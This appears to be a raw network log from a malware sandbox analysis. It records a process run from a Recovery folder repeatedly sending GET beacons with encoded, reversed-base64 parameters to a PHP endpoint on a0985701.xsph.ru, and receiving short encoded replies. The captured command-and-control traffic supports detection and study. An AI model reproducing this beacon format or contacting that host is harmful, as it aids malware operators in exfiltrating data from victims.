            May 24, 2024 11:07:43.267050028 CEST2158OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:07:44.102874041 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:43 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.449744141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:49.115508080 CEST2158OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:07:49.818958044 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:49 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.449745141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:54.835216045 CEST2132OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0Z [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:07:55.513802052 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:55 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.449747141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:00.543112993 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:08:01.238668919 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:01 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.449748141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:06.257934093 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:08:06.942858934 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:06 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.449749141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:12.115185022 CEST2158OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:08:12.793523073 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:12 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.449750141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:17.818942070 CEST2158OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:08:18.619081974 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:18 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.449751141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:23.692904949 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:08:24.397114038 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:24 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.449752141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:29.412646055 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:08:30.136791945 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:30 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
